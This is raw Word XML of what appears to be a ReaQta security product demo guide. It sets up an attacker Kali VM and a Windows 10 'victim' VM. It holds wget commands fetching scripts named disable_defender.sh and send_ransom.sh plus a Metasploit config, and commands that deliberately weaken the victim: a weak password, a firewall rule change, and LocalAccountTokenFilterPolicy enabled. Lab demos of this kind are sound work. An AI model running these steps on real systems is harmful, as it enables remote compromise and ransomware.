              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267852 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="136B3F2E" w14:textId="1D323637" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267853" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267853 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="705CC36D" w14:textId="70D0A9F0" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="31C220BD" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12574554" w14:textId="60B4673F" w:rsidR="004C0ABE" w:rsidRPr="001A6A55" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc101267842"/>
      <w:r w:rsidRPr="001A6A55">
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="03E9B6C7" w14:textId="6740F7E8" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="009C298F">
      <w:r>
        <w:t xml:space="preserve">This demo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is divided</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidR="00643E75">
        <w:t xml:space="preserve">nto three sections: </w:t>
      </w:r>
      <w:r>
        <w:t>Boom</w:t>
      </w:r>
      <w:r w:rsidR="00DB4E5A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:t>Left of Boom</w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and Right of Boom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB474F" w14:textId="77777777" w:rsidR="00643E75" w:rsidRDefault="00643E75" w:rsidP="009C298F"/>
    <w:p w14:paraId="76742704" w14:textId="77777777" w:rsidR="009C298F" w:rsidRPr="004C0ABE" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="34F1E8EA" w14:textId="0CF4C1C3" w:rsidR="004C0ABE" w:rsidRDefault="00643E75" w:rsidP="009C298F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24BA10E3" wp14:editId="7E0A7918">
            <wp:extent cx="6858000" cy="155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555750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA61250" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="009C298F"/>
    <w:p w14:paraId="2716DAE5" w14:textId="77777777" w:rsidR="00643E75" w:rsidRDefault="00643E75" w:rsidP="009C298F"/>
    <w:p w14:paraId="50972852" w14:textId="34350050" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="009C298F">
      <w:r>
        <w:t xml:space="preserve">These instructions and script should enable a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyber security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> professional to demonstrate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReaQta's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ability to </w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:t xml:space="preserve">detect and halt ongoing attacks, </w:t>
      </w:r>
      <w:r>
        <w:t>pr</w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:t xml:space="preserve">event phishing attacks </w:t>
      </w:r>
      <w:r>
        <w:t>and threat hunt for attacker footholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C275177" w14:textId="77777777" w:rsidR="009C298F" w:rsidRPr="009C298F" w:rsidRDefault="009C298F" w:rsidP="009C298F"/>
    <w:p w14:paraId="7F6EBB1D" w14:textId="693BC498" w:rsidR="004C0ABE" w:rsidRPr="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc101267843"/>
      <w:r w:rsidRPr="004C0ABE">
        <w:t>Demo Prep</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3C45D133" w14:textId="4AA56325" w:rsidR="006B7E5C" w:rsidRDefault="006B7E5C" w:rsidP="006B7E5C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc101267844"/>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Kali VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1E04197F" w14:textId="77777777" w:rsidR="00162B50" w:rsidRDefault="00162B50" w:rsidP="00162B50">
      <w:r>
        <w:t>Use the following network config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E52EC0A" w14:textId="4F83FADE" w:rsidR="00162B50" w:rsidRPr="001A6A55" w:rsidRDefault="00162B50" w:rsidP="00162B50">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IP: 192.168.57.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35F95F" w14:textId="77777777" w:rsidR="00162B50" w:rsidRPr="001A6A55" w:rsidRDefault="00162B50" w:rsidP="00162B50">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Netmask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: 255.255.255.0 (/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ACA521" w14:textId="77777777" w:rsidR="00162B50" w:rsidRPr="001A6A55" w:rsidRDefault="00162B50" w:rsidP="00162B50">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Default route: 192.168.57.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2547A0F5" w14:textId="77777777" w:rsidR="00162B50" w:rsidRPr="001A6A55" w:rsidRDefault="00162B50" w:rsidP="00162B50">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DNS: 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC82EB" w14:textId="77777777" w:rsidR="00162B50" w:rsidRDefault="00162B50" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="1CB03503" w14:textId="33C16776" w:rsidR="004C0ABE" w:rsidRPr="00BF1CD0" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF1CD0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF1CD0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00BF1CD0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/sudonim007/reaqta/main/msf_config.rc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DAAF608" w14:textId="31773087" w:rsidR="00BF1CD0" w:rsidRDefault="00BF1CD0" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF1CD0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF1CD0">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00BF1CD0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/sudonim007/reaqta/main/disable_defender.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="448D6E54" w14:textId="6CF97221" w:rsidR="0093551D" w:rsidRPr="00BF1CD0" w:rsidRDefault="0093551D" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0093551D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093551D">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
        </w:rPr>
        <w:t>https://raw.githubusercontent.com/sudonim007/reaqta/main/send_ransom.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAED050" w14:textId="23471B16" w:rsidR="00BF1CD0" w:rsidRDefault="00BF1CD0" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E6EBC3" w14:textId="5BE6AC1B" w:rsidR="00BF1CD0" w:rsidRDefault="00BF1CD0" w:rsidP="00BF1CD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF1CD0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF1CD0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> +x disable_defender.sh</w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>send_ransom.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B02FCB8" w14:textId="4972EE90" w:rsidR="00F74237" w:rsidRDefault="00F74237" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC7EF71" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="22CC9FB7" w14:textId="0268076C" w:rsidR="006B7E5C" w:rsidRDefault="006B7E5C" w:rsidP="006B7E5C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc101267845"/>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Windows 10 VM</w:t>
      </w:r>
      <w:r w:rsidR="00815B2C">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> without ReaQta Agent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="277FA381" w14:textId="389492D9" w:rsidR="00345EE8" w:rsidRDefault="00345EE8" w:rsidP="00345EE8">
      <w:r>
        <w:t xml:space="preserve">Make sure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>you're</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using the Pro version of Fusion (Mac) or VMware Workstation. Remove Virtual Box if you have it installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AB590" w14:textId="77777777" w:rsidR="00345EE8" w:rsidRPr="00345EE8" w:rsidRDefault="00345EE8" w:rsidP="00345EE8"/>
    <w:p w14:paraId="06CCBF91" w14:textId="1EB78681" w:rsidR="00AE1C4C" w:rsidRDefault="00984A6B" w:rsidP="00AE1C4C">
      <w:r>
        <w:t xml:space="preserve">Install Windows </w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r>
        <w:t>as a VMware VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF33730" w14:textId="78E54677" w:rsidR="00EC57EA" w:rsidRDefault="00EC57EA" w:rsidP="00AE1C4C"/>
    <w:p w14:paraId="6DCE427B" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00EC57EA" w:rsidP="00AE1C4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Use a user</w:t>
      </w:r>
      <w:r w:rsidR="00815B2C">
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC57EA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>'victim'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a password of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC57EA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>'weak123'</w:t>
      </w:r>
      <w:r w:rsidR="00815B2C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0802B8" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00AE1C4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECD441C" w14:textId="69E4567D" w:rsidR="00EC57EA" w:rsidRPr="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00AE1C4C">
      <w:r w:rsidRPr="00815B2C">
        <w:t>After installation, ru</w:t>
      </w:r>
      <w:r>
        <w:t>n Windows U</w:t>
      </w:r>
      <w:r w:rsidRPr="00815B2C">
        <w:t xml:space="preserve">pdate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00815B2C">
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00815B2C">
        <w:t xml:space="preserve"> ensure that Defender is up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B96998" w14:textId="77777777" w:rsidR="0084610A" w:rsidRDefault="0084610A" w:rsidP="001A6A55"/>
    <w:p w14:paraId="7C7100FC" w14:textId="68DF2084" w:rsidR="001A6A55" w:rsidRDefault="002809B7" w:rsidP="001A6A55">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After the updates are complete, s</w:t>
      </w:r>
      <w:r w:rsidR="005614AF">
        <w:t>top and d</w:t>
      </w:r>
      <w:r w:rsidR="001A6A55">
        <w:t>isable the Windows Update service</w:t>
      </w:r>
      <w:r w:rsidR="005614AF">
        <w:t xml:space="preserve"> using the services UI</w:t>
      </w:r>
      <w:r>
        <w:t>. This is to prevent any nasty surprises when you come to demo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53AFE8" w14:textId="5EB21049" w:rsidR="007D3E70" w:rsidRDefault="007D3E70" w:rsidP="001A6A55"/>
    <w:p w14:paraId="7027B974" w14:textId="66F05E26" w:rsidR="007D3E70" w:rsidRDefault="007D3E70" w:rsidP="001A6A55">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Change</w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sleep and screen-off times to 'Never'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E43F34F" w14:textId="77777777" w:rsidR="001A6A55" w:rsidRDefault="001A6A55" w:rsidP="00AE1C4C"/>
    <w:p w14:paraId="19CE2F49" w14:textId="20BA1853" w:rsidR="00984A6B" w:rsidRDefault="00984A6B" w:rsidP="00AE1C4C">
      <w:r>
        <w:t>Use the following network config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D2C1F" w14:textId="26DCAD6C" w:rsidR="00984A6B" w:rsidRPr="001A6A55" w:rsidRDefault="00984A6B" w:rsidP="00AE1C4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IP: 192.168.57.25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5C7D8" w14:textId="286914B8" w:rsidR="00984A6B" w:rsidRPr="001A6A55" w:rsidRDefault="00984A6B" w:rsidP="00AE1C4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Netmask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: 255.255.255.0 (/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624CA691" w14:textId="6794C60E" w:rsidR="00984A6B" w:rsidRPr="001A6A55" w:rsidRDefault="00984A6B" w:rsidP="00AE1C4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Default route: 192.168.57.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517EFBE6" w14:textId="4724EE8F" w:rsidR="00984A6B" w:rsidRPr="001A6A55" w:rsidRDefault="00984A6B" w:rsidP="00AE1C4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DNS: 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C299C9D" w14:textId="77777777" w:rsidR="00AE1C4C" w:rsidRDefault="00AE1C4C" w:rsidP="00AE1C4C"/>
    <w:p w14:paraId="34134354" w14:textId="77777777" w:rsidR="00AE1C4C" w:rsidRDefault="00AE1C4C" w:rsidP="00AE1C4C"/>
    <w:p w14:paraId="0B6180E9" w14:textId="4DC5B08F" w:rsidR="00AE1C4C" w:rsidRDefault="00AE1C4C" w:rsidP="00AE1C4C">
      <w:r>
        <w:t>Install VMware tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8663C3" w14:textId="3B48D1BC" w:rsidR="00AE1C4C" w:rsidRDefault="00AE1C4C" w:rsidP="00AE1C4C"/>
    <w:p w14:paraId="586D1761" w14:textId="77777777" w:rsidR="00FD0043" w:rsidRDefault="00FD0043" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="6D37D85D" w14:textId="7A7E4013" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Launch cmd.exe running as Administrator</w:t>
      </w:r>
      <w:r w:rsidR="002D1D51">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE103D" w14:textId="33CA8750" w:rsidR="002D1D51" w:rsidRDefault="002D1D51" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="7BB5D59C" w14:textId="270CB9F5" w:rsidR="002D1D51" w:rsidRDefault="002D1D51" w:rsidP="004C0ABE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E46BB0E" wp14:editId="6A82D3C3">
            <wp:extent cx="1328815" cy="28384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6039" cy="2875241"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49107939" w14:textId="4A29CE9A" w:rsidR="002D1D51" w:rsidRDefault="002D1D51" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="40E7D76A" w14:textId="2C19D066" w:rsidR="002D1D51" w:rsidRDefault="002D1D51" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="755C91B3" w14:textId="77777777" w:rsidR="002D1D51" w:rsidRDefault="002D1D51" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="753690DB" w14:textId="56242302" w:rsidR="002D1D51" w:rsidRDefault="002D1D51" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Run these commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127457A8" w14:textId="5F4500A5" w:rsidR="004C0ABE" w:rsidRPr="009040F4" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall set rule group="File and Printer Sharing" new enable=Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43966BC4" w14:textId="77777777" w:rsidR="0061577C" w:rsidRDefault="0061577C" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="145382DA" w14:textId="390E1E19" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu</w:t>
      </w:r>
      <w:r w:rsidR="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rrentVersion\Policies\System /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LocalAccountTokenFilterPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /t  REG_DWORD /d 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA581EA" w14:textId="226C55F5" w:rsidR="001A6A55" w:rsidRDefault="001A6A55" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
